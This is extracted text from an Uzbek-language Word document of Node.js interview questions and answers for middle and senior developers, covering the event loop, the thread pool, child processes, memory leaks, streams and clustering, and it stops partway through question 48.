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A3A6B"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Node.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4A90D9"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Interview Savol va Javoblari</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Middle+ / Senior daraja | 90 ta savol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1. Node.js nima va u qanday ishlaydi?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 — bu JavaScript'ni brauzerdan tashqarida, server tomonida ishlatish imkonini beruvchi runtime muhit. U Google Chrome'ning V8 JavaScript dvigatelida qurilgan va libuv kutubxonasi yordamida asinxron I/O operatsiyalarini amalga oshiradi.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Qanday ishlaydi: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JavaScript kodi V8 tomonidan machine code'ga compile qilinadi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I/O operatsiyalar (fayl o'qish, tarmoq so'rovi) libuv orqali OS ga topshiriladi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Natijalar tayyor bo'lganda Event Loop callback'ni chaqiradi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fs = require('fs');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fs.readFile('file.txt', 'utf8', (err, data)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console.log(data); // fayl o'qilgandan keyin chaqiriladi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console.log('Bu birinchi chiqadi'); // asinxron bo'lgani uchun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2. Node.js nega single-thread hisoblanadi?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Node.js'ning asosiy JavaScript execution qismi bitta thread'da ishlaydi — bu Event Loop thread'i. Shuning uchun "single-thread" deyiladi.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Lekin bu "kuchsiz" degani emas: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Bitta thread JavaScript kodini ketma-ket bajaradi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I/O operatsiyalari esa libuv orqali OS thread pool'iga yuboriladi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Thread pool default 4 ta thread'dan iborat (UV_THREADPOOL_SIZE orqali oshirish mumkin)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Afzalligi: Thread yaratish va ular orasida context switching xarajati yo'q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Kamchiligi: CPU heavy task butun thread'ni bloklaydi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3. Node.js qanday qilib parallel ishlaydi?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 parallel ishni quyidagi mexanizmlar orqali ta'minlaydi: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libuv Thread Pool — fayl tizimi, DNS, crypto operatsiyalar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OS Kernel Async — TCP/UDP, socket operatsiyalar uchun (thread sarflamaydi)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Worker Threads — JavaScript kodini parallel bajarish uchun (Node.js 10.5+)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Child Process — alohida process yaratish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Cluster Module — bir nechta Node.js process'lari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 (Worker Threads):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Worker } = require('worker_threads');
const worker = new Worker('./heavy-task.js');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worker.on('message', result =&gt; console.log(result));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4. Event Loop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Event Loop — Node.js'ning asosiy mexanizmi bo'lib, asinxron operatsiyalarni boshqaradi va callback'larni ketma-ket bajaradi.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Sodda tushuntirish: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Kod bajariladi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Asinxron operatsiya topshiriladi (setTimeout, fs.readFile)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Event Loop kutadi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Operatsiya tugaganda callback queue'ga qo'shiladi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Event Loop callback'ni bajaradi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while (true)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(callbackQueue.hasTasks()) {
    callbackQueue.processNext();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Bu oddiy loop kabi ishlaydi, lekin ichida 6 ta faza mavjud.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5. Event Loop fazalari qanday?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Event Loop 6 ta asosiy fazadan iborat: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TIMERS — setTimeout() va setInterval() callbacklari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PENDING CALLBACKS — oldingi iteratsiyada bajarilmagan I/O xatolari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IDLE/PREPARE — faqat ichki foydalanish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POLL — yangi I/O eventlarini kutish va bajarish (eng muhim faza)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CHECK — setImmediate() callbacklari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6. CLOSE CALLBACKS — socket.on('close') kabi yopish callbacklari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Har faza o'rtasida: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process.nextTick() queue tozalanadi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Promise microtask queue tozalanadi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Tartib: nextTick → Promise.then → timers → poll → check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6. Call Stack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Call Stack — JavaScript'ning funksiya chaqiruvlarini kuzatadigan LIFO (Last In First Out) ma'lumotlar tuzilmasi.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a() {
  b();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b() {
  c();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c() {
  console.log('hello');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Stack holati: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[c] ← yuqori (eng oxirgi kiritilgan)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[b]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[a]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[main]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c() tugagach stack'dan chiqadi, keyin b(), keyin a().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Call Stack to'lsa: "RangeError: Maximum call stack size exceeded" xatosi chiqadi (recursion muammosi).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7. Microtask va Macrotask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Microtask — yuqori prioritetli vazifalar, joriy operatsiya tugagach DARHOL bajariladi.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Macrotask — oddiy vazifalar, Event Loop'ning keyingi iteratsiyasida bajariladi.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Microtask (tezroq):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Promise.then(), Promise.catch()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process.nextTick() (eng tez!)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queueMicrotask()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Macrotask (sekinroq):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setTimeout(), setInterval()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setImmediate()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I/O callbacks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console.log('1');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setTimeout(() =&gt; console.log('4'), 0);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Promise.resolve().then(() =&gt; console.log('3'));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process.nextTick(() =&gt; console.log('2'));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Natija: 1 → 2 → 3 → 4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8. Promise.then qayerda ishlaydi?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Promise.then — Microtask Queue'da ishlaydi. Bu degani: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Call Stack bo'shagandan keyin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Lekin setTimeout/setImmediate dan OLDIN bajariladi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Promise.resolve()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.then(() =&gt; console.log('A'))
  .then(() =&gt; console.log('B'));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setTimeout(() =&gt; console.log('C'), 0);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console.log('D');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Natija: D → A → B → C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Izoh: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D — sinxron, darhol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A, B — microtask (Promise.then)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C — macrotask (setTimeout)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9. process.nextTick nima va xavfi nimada?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process.nextTick() — joriy operatsiya tugagandan so'ng, Event Loop davom etishidan OLDIN callback'ni bajaradi. Hatto Promise.then dan ham oldin!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process.nextTick(() =&gt; console.log('nextTick'));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Promise.resolve().then(() =&gt; console.log('promise'));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console.log('sync');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Natija: sync → nextTick → promise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XAVFI — Recursive nextTick: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recursiveNextTick() {
  process.nextTick(recursiveNextTick); // XAVFLI!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recursiveNextTick();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I/O va setTimeout hech qachon ishlamaydi!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Bu I/O "starvation" ga olib keladi — boshqa operatsiyalar hech qachon bajarilmaydi.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10. setTimeout, setImmediate, process.nextTick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Bajarilish tartibi: nextTick → Promise.then → setTimeout(0) ≈ setImmediate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process.nextTick(() =&gt; console.log('1-nextTick'));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Promise.resolve().then(() =&gt; console.log('2-promise'));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setImmediate(() =&gt; console.log('4-immediate'));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setTimeout(() =&gt; console.log('3-timeout'), 0);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Natija: 1-nextTick → 2-promise → 3-timeout → 4-immediate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ishlatish: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nextTick: API callback'larini sinxron kabi his qildirish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setImmediate: I/O callback'laridan keyin ishlatish uchun (setImmediate I/O dan keyin ishlaydi)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setTimeout(fn, 0): Minimal kechikish bilan keyingi iteratsiyada ishlash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11. libuv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libuv — Node.js'ning asinxron I/O kutubxonasi (C tili bilan yozilgan). U Node.js'ga platformalararo (Windows, Linux, macOS) asinxron ishlash imkonini beradi.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libuv nima qiladi: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Event Loop'ni implement qiladi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Thread pool boshqaradi (default 4 thread)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Fayl tizimi operatsiyalari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DNS resolve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TCP/UDP socket'lar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Signallar va timerlar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libuv = Node.js'ning "yurak urishi"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V8 (JavaScript) + libuv (Async I/O) = Node.js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12. Thread pool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Thread pool — libuv tomonidan boshqariladigan, I/O va CPU operatsiyalarini parallel bajaruvchi threadlar to'plami.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Thread pool ishlatadigan operatsiyalar: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fs.readFile, fs.writeFile (fayl operatsiyalari)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crypto.pbkdf2, crypto.randomBytes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DNS lookup (dns.lookup)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zlib (compress/decompress)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UV_THREADPOOL_SIZE=8 node app.js // 8 ta threadga oshirish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crypto = require('crypto');
// Bu 4 ta parallel ishga tushadi (default pool = 4)
for (let i = 0; i &lt; 4; i++) {
  crypto.pbkdf2('password', 'salt', 100000, 64, 'sha512', () =&gt; {
    console.log(i + ' tayyor');
 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13. Thread pool default nechta thread'dan iborat?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Default: 4 ta thread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Oshirish mumkin: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UV_THREADPOOL_SIZE=8 node app.js  // Environment variable orqali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Yoki kod ichida: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process.env.UV_THREADPOOL_SIZE = '8'; // App boshida, amalda ishlamaydi
// To'g'ri yo'l — environment variable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Maksimum: 1024 ta thread (amaliyla 128 tavsiya etiladi)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oshirish kerak: Ko'p parallel fayl/crypto operatsiyalari bo'lganda, masalan 4 ta parallel crypto.pbkdf2 callida 5-chi call birinchi 4 tasi tugaguncha kutadi.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14. Qaysi operatsiyalar thread pool'da ishlaydi?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Thread pool'da ishlaydiganlar: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File System (fs module) — o'qish, yozish, stat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DNS — dns.lookup() (dns.resolve() emas!)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Crypto — pbkdf2, scrypt, randomBytes, randomFill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Zlib — gzip/deflate/inflate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HTTP parser (ba'zi holatlarda)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Thread pool'da ISHLAMAYDIGAN (OS kernel async):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TCP/UDP (net, http, https)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Unix pipe/socket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Child process spawn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Signals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Muhim: http.get() thread pool ishlatmaydi! OS kernel tomonidan boshqariladi.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15. Thread pool to'lib qolsa nima bo'ladi?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Thread pool to'lsa yangi operatsiyalar QUEUE'ga qo'shiladi va mavjud thread bo'shashini kutadi.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 (default 4 thread, 6 ta so'rov):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crypto = require('crypto');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console.time('all');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(let i = 0; i &lt; 6; i++) {
  crypto.pbkdf2('pwd', 'salt', 100000, 64, 'sha512', () =&gt; {
    console.timeEnd('all'); // 5,6-chi 2x sekin bo'ladi!
 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1-4 chi parallel ishlaydi (masalan 1 soniya)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5-6 chi kutadi, keyin ishlaydi (2 soniya jami)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Yechim: UV_THREADPOOL_SIZE ni oshirish yoki Worker Threads ishlatish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16. Blocking va Non-blocking code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Blocking — operatsiya tugaguncha keyingi kod KUTADI (Event Loop bloklaydi).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Non-blocking — operatsiya orqa fonda ishlaydi, callback bilan xabar beradi.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BLOCKING (yomon):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data = fs.readFileSync('big-file.txt'); // kutadi!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console.log('Bu kechikadi'); // faqat fayl o'qilgandan keyin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NON-BLOCKING (yaxshi):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fs.readFile('big-file.txt', (err, data)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console.log(data); // fon da ishlaydi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console.log('Bu darhol chiqadi'); // kutmaydi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Production'da fs.readFileSync, crypto.pbkdfSync kabi Sync metodlardan qoching — ular butun serveringizni bloklaydi!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17. Event Loop'ni bloklab qo'yadigan kodga misol keltiring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Bloklash misollari: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1. CPU heavy loop
for (let i = 0; i &lt; 1e10; i++) {} // ~10 soniya bloklaydi!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2. Sync fayl operatsiyasi
const data = fs.readFileSync('huge-file.txt'); // kutadi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3. JSON.parse (katta ma'lumot)
const obj = JSON.parse(hugeJsonString); // 100MB+ bo'lsa muammo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4. Regex (catastrophic backtracking)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/(a+)+$/.test('aaaaaaaaaaaaaaaaaaaab'); // cheksiz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5. Sync crypto
const hash = crypto.createHash('sha256').update(bigData).digest('hex');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Tekshirish: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start = Date.now();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setInterval(()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delay = Date.now() - start;
  if (delay &gt; 100) console.warn('BLOCKED:', delay + 'ms');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}, 10);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18. CPU heavy task Node.js'da nima uchun muammo?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 single-thread bo'lgani uchun CPU heavy task butun Event Loop'ni bloklaydi. Bu vaqtda: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Boshqa HTTP requestlar kutadi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Timeoutlar kechikadi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Server "muzlab qolganday" bo'ladi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app.get('/normal', (req, res) =&gt; res.send('tez')); // oddiy route
app.get('/heavy', (req, res) =&gt; {
  // CPU heavy task
  let sum = 0;
  for (let i = 0; i &lt; 1e10; i++) sum += i; // 10 soniya
  res.send(sum.toString());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/heavy chaqirilganda barcha /normal requestlar ham kutib qoladi!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19. CPU heavy task bo'lsa qanday yechimlar bor?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 ta asosiy yechim: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Worker Threads (eng yaxshi Node.js yechimi):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Worker } = require('worker_threads');
app.get('/heavy', (req, res) =&gt; {
  const worker = new Worker('./heavy.js');
  worker.on('message', result =&gt; res.send(result));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Child Process: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fork } = require('child_process');
const child = fork('./heavy.js');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child.on('message', result =&gt; res.send(result));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Vazifani bo'laklash (chunking):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processChunk(arr, index) {
  // kichik qism ishla
  if (index &lt; arr.length) setImmediate(() =&gt; processChunk(arr, index + 1));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Tashqi servis: Heavy task'ni Python/Go microservice'ga yuborish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20. Worker Threads qachon ishlatiladi?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Worker Threads — JavaScript kodini parallel, alohida thread'da bajarish uchun ishlatiladi.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Image/video processing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Machine learning inference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Katta JSON parse/stringify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Kriptografik hisob-kitoblar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Katta hajmli matematik operatsiyalar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main.js
const { Worker, isMainThread, parentPort } = require('worker_threads');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(isMainThread) {
  const worker = new Worker(__filename);
  worker.on('message', msg =&gt; console.log('Result:', msg));
  worker.postMessage({ data: [1,2,3,4,5]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 else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parentPort.on('message', ({ data }) =&gt; {
    const result = data.reduce((a, b) =&gt; a + b, 0);
    parentPort.postMessage(result);
 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Worker Threads — Child Process'dan farqli o'laroq, memory share qila oladi (SharedArrayBuffer).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21. Child Process qachon ishlatiladi?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 Process — alohida process (Node.js yoki boshqa dastur) ishga tushirish uchun.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Boshqa tildagi dastur chaqirish (Python, Shell script)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Alohida Node.js process kerak bo'lganda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Worker Threads yetarli bo'lmasa (to'liq izolyatsiya kerak)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Tizim buyruqlarini bajarish (ls, ffmpeg)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Shell buyruq bajarish
const { exec } = require('child_process');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exec('ls -la', (err, stdout) =&gt; console.log(stdout));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Python script chaqirish
const { spawn } = require('child_process');
const py = spawn('python3', ['script.py']);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py.stdout.on('data', data =&gt; console.log(data.toString()));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 Process — Worker Thread'dan farqli o'laroq, alohida memory space ishlatadi.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22. Child Process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 Process — asosiy Node.js process'dan alohida yaratilgan mustaqil OS process'i.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Xususiyatlari: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Alohida memory space (izolyatsiya)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IPC (Inter-Process Communication) orqali muloqot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Asosiy process bilan parallel ishlaydi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Crash bo'lsa asosiy process'ga ta'sir qilmaydi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fork } = require('child_process');
const child = fork('./worker.js');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child.send({ task: 'heavy-compute' }); // IPC orqali yuborish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child.on('message', msg =&gt; console.log('From child:', msg));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child.on('exit', code =&gt; console.log('Child exited:', code));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 ta usul: exec, execFile, spawn, fork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23. exec, execFile, spawn, fork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exec — shell orqali buyruq, buffer'da natija, kichik output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execFile — shell siz to'g'ridan-to'g'ri fayl, xavfsizroq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spawn — stream orqali, katta output uchun ideal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fork — Node.js script uchun, IPC bor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exec — shell buyruq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exec('ls | grep .js', (err, stdout) =&gt; console.log(stdout));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execFile — to'g'ridan-to'g'ri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execFile('/usr/bin/python3', ['script.py'], (err, stdout) =&gt; {});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spawn — katta output (video, katta fayl)
const ls = spawn('ls', ['-la']);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ls.stdout.on('data', chunk =&gt; process.stdout.write(chunk));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fork — Node.js worker, IPC bilan
const worker = fork('./worker.js');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worker.send({ job: 'compute'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Xavfsizlik: exec shell injection xavfli, execFile/spawn afzal!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24. Qachon spawn ishlatiladi?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spawn quyidagi holatlarda ishlatiladi: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Katta hajmli output bo'lganda (buffer overflow xavfi yo'q)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Real-time output kerak bo'lganda (streaming)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Uzoq davom etadigan jarayonlar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ffmpeg, imagemagick, git kabi CLI toollar uchun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Video konvertatsiya (katta output)
const ffmpeg = spawn('ffmpeg', [
  '-i', 'input.mp4',
  '-c:v', 'libx264',
  'output.mp4'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]);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ffmpeg.stdout.on('data', data =&gt; console.log(data.toString()));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ffmpeg.stderr.on('data', data =&gt; console.error(data.toString()));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ffmpeg.on('close', code =&gt; console.log('Exit:', code));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exec buffer 200KB bilan cheklangan — spawn'da bu cheklov yo'q!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25. Qachon fork ishlatiladi?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fork — Node.js script'ini alohida process sifatida ishga tushirib, IPC orqali muloqot qilish uchun.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CPU heavy Node.js kodi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Worker pool yaratishda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Cluster'dan oldin (manual cluster)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Child process bilan ikki tomonlama muloqot kerak bo'lganda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main.js
const { fork } = require('child_process');
const workers = [];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(let i = 0; i &lt; 4; i++) {
  const w = fork('./worker.js');
  workers.push(w);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runTask(data) {
  return new Promise(resolve =&gt; {
    const worker = workers.pop();
    worker.send(data);
    worker.once('message', result =&gt; {
      workers.push(worker); // qaytarish
      resolve(result);
    });
 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fork = spawn + IPC + Node.js specific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26. IPC (Inter-Process Communication)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IPC — ota-process va bola-process orasidagi aloqa kanali. Node.js'da fork() orqali avtomatik yaratiladi.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parent.js
const { fork } = require('child_process');
const child = fork('./child.js');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child.send({ type: 'compute', data: [1, 2, 3] }); // yuborish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child.on('message', msg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console.log('Result:', msg.result); // qabul qilish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child.js
process.on('message', msg =&gt; {
  if (msg.type === 'compute') {
    const result = msg.data.reduce((a, b) =&gt; a + b, 0);
    process.send({ result }); // javob qaytarish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IPC JSON serialization ishlatadi — funksiya, circular reference yubora olmaysiz.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Cluster module ham IPC ishlatadi (worker ↔ master).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27. Child process'ni qanday yopish kerak?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 process'ni to'g'ri yopish — resource leak oldini oladi.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1. Graceful yopish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child.kill('SIGTERM'); // "iltimos yon" signal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Child SIGTERM eshitib o'zini yopadi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2. Majburiy yopish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child.kill('SIGKILL'); // "zo'rlik bilan o'chir"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SIGKILL'ni catch qilib bo'lmaydi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3. Disconnect (IPC yopish)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child.disconnect(); // IPC'ni yopadi, process davom etadi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Child tomonida graceful yopish
process.on('SIGTERM', async () =&gt; {
  await cleanup(); // DB connection yopish
  process.exit(0);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4. Timeout bilan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child.kill('SIGTERM');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setTimeout(()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(!child.killed) child.kill('SIGKILL'); // 5 soniya kutgach majburiy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}, 5000);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28. Child process'da error handling qanday qilinadi?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 process xatolarini bir necha joy'da ushlaш kerak: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child = fork('./worker.js');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1. Process crash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child.on('exit', (code, signal)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(code !== 0) {
    console.error('Child crashed, code:', code, 'signal:', signal);
    // Restart qilish
    restartWorker();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2. Process ochilmasa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child.on('error', err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console.error('Spawn error:', err.message);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3. IPC xatosi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child.on('message', msg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(msg.error) console.error('Worker error:', msg.error);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worker.js ichida
process.on('uncaughtException', err =&gt; {
  process.send({ error: err.message });
  process.exit(1); // Xato bo'lsa chiqish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29. Node.js'da memory leak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Memory leak — dastur ishlatib bo'lingan memory'ni to'g'ri bo'shatmasa, vaqt o'tishi bilan RAM ko'payib boradi.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Node.js'da leak belgilari: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process.memoryUsage().heapUsed doimiy o'sadi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Server bir necha kundan keyin sekinlashadi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"JavaScript heap out of memory" xatosi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Oddiy misol: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cache = {}; // hech qachon tozalanmaydi!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app.get('/data', (req, res) =&gt; {
  cache[req.query.id] = hugeData; // leak!
  res.send('ok');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To'g'ri yechim: LRU Cache yoki TTL qo'shish
const LRU = require('lru-cache');
const cache = new LRU({ max: 1000, ttl: 60000 });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30. Memory leak sabablari nimalar?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Asosiy sabablar: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Global o'zgaruvchilar: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global.myCache = {}; // hech qachon tozalanmaydi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Event listener'lar (eng keng tarqalgan):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emitter.on('data', handler); // removeListener qilinmasa!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To'g'risi: emitter.once() yoki emitter.removeListener()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Closure'da katta ob'ektlar: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createServer() {
  const bigData = new Array(1e6).fill('x');
  return () =&gt; bigData.length; // bigData saqlanib qoladi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Promise zanjiri (resolve qilinmagan):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new Promise(resolve =&gt; {}); // hech qachon resolve bo'lmasa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setInterval tozalanmasa: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id = setInterval(heavyFn, 1000);
// clearInterval(id) qilinmasa — leak!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6. Cache TTL yo'q: har kelgan ma'lumot saqlanib boradi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31. Heap size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Heap — Node.js'ning ob'ektlar va ma'lumotlarni saqlaydigan memory maydoni. V8 engine tomonidan boshqariladi.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Heap turlari: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New Space (Young Generation): Yangi ob'ektlar, kichik (1-8 MB)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Old Space (Old Generation): Uzoq yashovchi ob'ektlar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Large Object Space: 1MB dan katta ob'ektlar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Code Space: JIT compiled kod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process.memoryUsage() orqali ko'rish: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rss: 50 MB,        // Jami process memory
  heapTotal: 30 MB,  // V8'ga berilgan heap
  heapUsed: 20 MB,   // Hozir ishlatilayotgan heap
  external: 5 MB     // C++ (Buffer) memory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Default heap limit: ~1.5 GB (64-bit tizimda)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32. Heap size'ni qanday oshirish mumkin?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--max-old-space-size flag orqali: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 --max-old-space-size=4096 app.js  // 4GB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package.json'da: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"scripts": {
    "start": "node --max-old-space-size=4096 app.js"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Environment variable (ba'zi versiyalarda):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NODE_OPTIONS="--max-old-space-size=4096" node app.js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oshirish kerak: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"JavaScript heap out of memory" xatosi chiqqanda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Katta dataset bilan ishlayotganda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Memory leak tuzatilgunga qadar vaqtinchalik yechim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DIQQAT: Heap oshirish — leak'ni yashirishi mumkin! Avval leak'ni toping.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33. Memory leak'ni qanday aniqlaysiz?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 necha usul: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process.memoryUsage() monitoring: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setInterval(()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heapUsed } = process.memoryUsage();
  console.log('Heap:', Math.round(heapUsed / 1024 / 1024) + 'MB');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}, 5000);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Chrome DevTools (--inspect):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 --inspect app.js
// Chrome'da chrome://inspect oching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heapdump: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heapdump = require('heapdump');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heapdump.writeSnapshot('./heap-' + Date.now() + '.heapsnapshot');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clinic.js (eng kuchli):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npm install -g clinic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clinic doctor -- node app.js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PM2 monitoring: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monit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Qiyoslash: 2 ta heap snapshot olib "Comparison" mode'da farqni ko'ring.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34. --inspect va heap snapshot nima?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--inspect — Node.js'ni debug mode'da ishga tushiradi, Chrome DevTools ulanish imkonini beradi.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 --inspect app.js
// yoki port bilan:
node --inspect=9229 app.js
// Darhol to'xtash uchun:
node --inspect-brk app.js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Chrome'da: chrome://inspect → "Open dedicated DevTools for Node"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Heap Snapshot — ma'lum vaqtdagi heap'ning to'liq "surati":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Kod orqali:
const v8 = require('v8');
const snapshot = v8.writeHeapSnapshot();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console.log('Snapshot:', snapshot);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Foydalanish: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Birinchi snapshot → bajaring → 2-snapshot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DevTools'da "Comparison" — nima o'sganini ko'ring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Leak qilayotgan ob'ektlarni toping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35. Stream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Stream — ma'lumotlarni to'liq yuklamasdan, bo'laklab (chunk) o'qish/yozish mexanizmi.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Nima uchun: 1GB fayl o'qiyotganda butuni RAM'ga yuklamasdan, 64KB'lik bo'laklarda ishlash mumkin.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fs = require('fs');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Yomon (butun fayl RAM'ga):
const data = fs.readFileSync('1GB.txt'); // 1GB RAM sarflanadi!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Yaxshi (stream):
const readable = fs.createReadStream('1GB.txt');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readable.on('data', chunk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console.log('Chunk size:', chunk.length); // 64KB bo'laklar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readable.on('end', () =&gt; console.log('Tugadi'));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Stream = conveyor belt (konveyer lenta) kabi ishlaydi — bo'laklarda uzatish.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36. Stream turlari qaysilar?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 ta asosiy stream turi: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Readable — faqat o'qish (ma'lumot olinadi)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fs.createReadStream(), http.IncomingMessage, process.stdin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Writable — faqat yozish (ma'lumot yuboriladi)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fs.createWriteStream(), http.ServerResponse, process.stdout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Duplex — ham o'qish ham yozish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net.Socket (TCP socket)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Transform — o'qib, o'zgartirib yozish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zlib.createGzip(), crypto.createCipher()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Transform misol:
const { Transform } = require('stream');
const upper = new Transform({
  transform(chunk, encoding, callback) {
    this.push(chunk.toString().toUpperCase());
    callback();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process.stdin.pipe(upper).pipe(process.stdout);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37. pipe() nima qiladi?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pipe() — Readable stream'dan Writable stream'ga ma'lumotni avtomatik uzatadi va backpressure'ni boshqaradi.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Fayl nusxalash
const readStream = fs.createReadStream('input.txt');
const writeStream = fs.createWriteStream('output.txt');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readStream.pipe(writeStream);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Bir nechta pipe (zanjir):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fs.createReadStream('input.txt')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.pipe(zlib.createGzip())       // gzip siqish
  .pipe(crypto.createCipher(...)) // shifrlash
  .pipe(fs.createWriteStream('output.gz.enc')); // yozish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Promise bilan (Node 10+):
const { pipeline } = require('stream/promises');
await pipeline(
  fs.createReadStream('input.txt'),
  zlib.createGzip(),
  fs.createWriteStream('output.gz')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pipeline() xatolarni ham ushlab, leaklarni oldini oladi.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38. Backpressure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Backpressure — ma'lumot yozuvchi (writer) o'quvchidan (reader) sekin ishlasa, bufferning to'lib ketishini oldini olish mexanizmi.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Muammo: 1Gbps tarmoq → 10Mbps disk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O'qish tez, yozish sekin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Buffer to'lib, memory oshadi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 stream avtomatik boshqaradi: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readable = fs.createReadStream('big-file.txt');
const writable = fs.createWriteStream('output.txt');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readable.on('data', chunk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canContinue = writable.write(chunk);
  if (!canContinue) {
    readable.pause(); // backpressure!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writable.on('drain', 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readable.resume(); // buffer bo'shadi, davom et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pipe() bularni avtomatik qiladi!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readable.pipe(writable);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39. Stream nega katta fayllar uchun muhim?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Stream ishlatmasdan vs Stream bilan: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YOMON — 1GB fayl:
app.get('/download', (req, res) =&gt; {
  const data = fs.readFileSync('1GB.mp4'); // 1GB RAM!
  res.send(data);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100 ta so'rov = 100GB RAM talab!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YAXSHI — Stream:
app.get('/download', (req, res) =&gt; {
  const stream = fs.createReadStream('1GB.mp4');
  stream.pipe(res); // Chunk by chunk, ~64KB RAM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100 ta so'rov = ~6.4MB RAM!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Afzalliklari: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Memory samaradorligi — butun fayl RAM'ga yuklanmaydi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Tezroq TTFB (Time To First Byte) — birinchi chunk darhol yuboriladi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Katta fayllar bilan ishlash imkoniyati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Pipeline orqali parallel qayta ishlash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40. Buffer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Buffer — Node.js'da binary ma'lumotlarni ifodalovchi, V8 heap'dan tashqari ajratiladigan memory maydoni.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Yaratish usullari:
const buf1 = Buffer.alloc(10);          // 10 byte, 0 bilan to'ldirilgan
const buf2 = Buffer.from('hello');       // stringdan
const buf3 = Buffer.from([0x48, 0x65]); // byte massivdan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O'qish/yozish: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buf2.toString('utf8');   // 'hello'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buf2.toString('hex');    // '68656c6c6f'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buf2.toString('base64'); // 'aGVsbG8='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String bilan farqi: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String: UTF-16 encoded, immutable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Buffer: Raw bytes, mutable, V8 heap'dan tashqarida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ishlatiladi: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TCP/UDP stream ma'lumotlari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Fayl binary ma'lumotlari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Kriptografiya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Image processing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41. Node.js multi-core'dan qanday foydalanadi?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 default bitta core ishlatadi. Multi-core uchun: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Cluster Module (eng keng tarqalgan):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cluster = require('cluster');
const os = require('os');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(cluster.isMaster) {
  const cpus = os.cpus().length; // 8 core
  for (let i = 0; i &lt; cpus; i++) {
    cluster.fork(); // har core uchun 1 worker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 else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require('./app'); // har worker server ishga tushiradi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PM2 (production uchun):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start app.js -i max  // barcha core'lar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Worker Threads: Parallel JavaScript execution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Natija: 8 core'li server — ~8x throughput oshishi (I/O bound tasklar uchun)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42. Cluster module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Cluster — bitta portda bir nechta Node.js process ishlatib, multi-core CPU'dan foydalanish moduli.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cluster = require('cluster');
const http = require('http');
const os = require('os');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(cluster.isPrimary) {
  console.log('Master PID:', process.pid);
  for (let i = 0; i &lt; os.cpus().length; i++) {
    cluster.fork();
  }
  cluster.on('exit', (worker, code) =&gt; {
    console.log('Worker died:', worker.process.pid);
    cluster.fork(); // qayta ishga tushirish
 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 else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http.createServer((req, res) =&gt; {
    res.writeHead(200);
    res.end('Worker: ' + process.pid);
  }).listen(3000);
  console.log('Worker PID:', process.pid);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OS Load Balancer barcha worker'lar orasida requestlarni taqsimlaydi.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43. Cluster va Child Process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Cluster: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Bitta portda bir nechta server worker'i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OS load balancing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Faqat Node.js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Asosan HTTP server scalability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Worker'lar bir xil kodni bajaradi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 Process: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Turli xil tasklar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Har xil dasturlar (Python, Shell)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IPC orqali muloqot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Bir yo'nalish — ota buyruq beradi, bola bajaradi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cluster = Restaurant (barcha ofitsiantlar bir xil menu)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child_process = Kitchen (aşpaz, oshpaz, konditer — har biri o'z vazifasi)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Birgalikda ishlatish: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Cluster (HTTP server) + Child Process (heavy task worker) = mukammal arxitektura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44. PM2 nima va u nima beradi?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PM2 — Node.js uchun production process manager.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Asosiy afzalliklari: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Auto-restart — crash bo'lsa darhol qayta ishga tushadi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Cluster mode — multi-core avtomatik ishlatadi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Log management — barcha loglar bir joyda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Monitoring — CPU, RAM, restartlar soni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Zero-downtime reload — restart vaqtida traffic to'xtamaydi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Asosiy buyruqlar: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start app.js             # ishga tushirish
pm2 start app.js -i max      # cluster mode (barcha core)
pm2 list                     # barcha process'lar
pm2 logs                     # real-time loglar
pm2 monit                    # monitoring dashboard
pm2 reload app               # zero-downtime restart
pm2 startup                  # OS reboot'da avtomatik start
pm2 save                     # konfigni saqlash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45. Nega cluster bo'lsa ham CPU 100% bo'lishi mumkin?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Cluster faqat requestlarni taqsimlaydi — agar har bir request CPU heavy bo'lsa, barcha worker'lar band bo'ladi!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Sabablar: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CPU heavy kodni har worker bajaradi (har worker 100% bo'ladi)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Worker soni = Core soni, lekin core'lar yetarli emas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Memory thrashing — RAM to'lsa CPU swap bilan band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GC (Garbage Collection) — katta heap'da uzoq GC pauzalari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Yechimlar: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CPU heavy taskni Worker Threads'ga ko'chirish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Heavy taskni queue + background worker'ga berish (RabbitMQ)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Horizontal scaling — ko'proq server qo'shish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Caching — takroriy hisob-kitoblarni kamaytirish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Monitoring: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monit  // Real-time CPU ko'rish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46. throw va Promise.reject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throw — sinxron xato tashlaydi, try/catch ushlab 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Promise.reject — asinxron xato, .catch() ushlab oladi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throw — sinxron
function validateAge(age) {
  if (age &lt; 0) throw new Error('Yosh manfiy bo'lmaydi');
  return age;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try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validateAge(-1);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 catch (err)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console.log(err.message); // ushlanadi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Promise.reject — asinxron
async function fetchUser(id) {
  if (!id) return Promise.reject(new Error('ID kerak'));
  return await db.find(id);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async funksiyada throw = Promise.reject
async function fetchUser(id) {
  if (!id) throw new Error('ID kerak'); // bu ham reject qiladi!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fetchUser(null).catch(err =&gt; console.log(err.message));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47. try/catch async code'da qanday ishlaydi?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async/await bilan try/catch sinxron kod kabi ishlaydi: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async/await + try/catch
async function getUser(id) {
  try {
    const user = await db.findUser(id); // await reject qilsa — catch'ga
    const posts = await db.getPosts(user.id);
    return { user, posts };
  } catch (err) {
    console.error('Xato:', err.message);
    throw err; // yuqoriga uzatish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Promise zanjiri bilan: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db.findUser(id)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.then(user =&gt; db.getPosts(user.id))
  .catch(err =&gt; console.error(err));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DIQQAT — bu ishlamaydi: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bad() {
  try {
    setTimeout(() =&gt; {
      throw new Error('Bu catch ga bormaydi!'); // !!!
    }, 100);
  } catch (err) {} // bo'sh qoladi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setTimeout ichidagi xato try/catch bilan ushlanmaydi — event listenerda qo'shimcha ushlov kerak.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48. uncaughtException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uncaughtException — try/catch bilan ushlanmagan sinxron xatolar yoki asinxron kontekstdagi xatolar uchun global handler.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process.on('uncaughtException', (err, origin) =&gt; {
  console.error('Ushlanmagan xato:', err.message);
  console.error('Kelib chiqishi:', origin);
  // Log yozib process'ni to'xtating!
  fs.writeFileSync('error.log', err.stack);
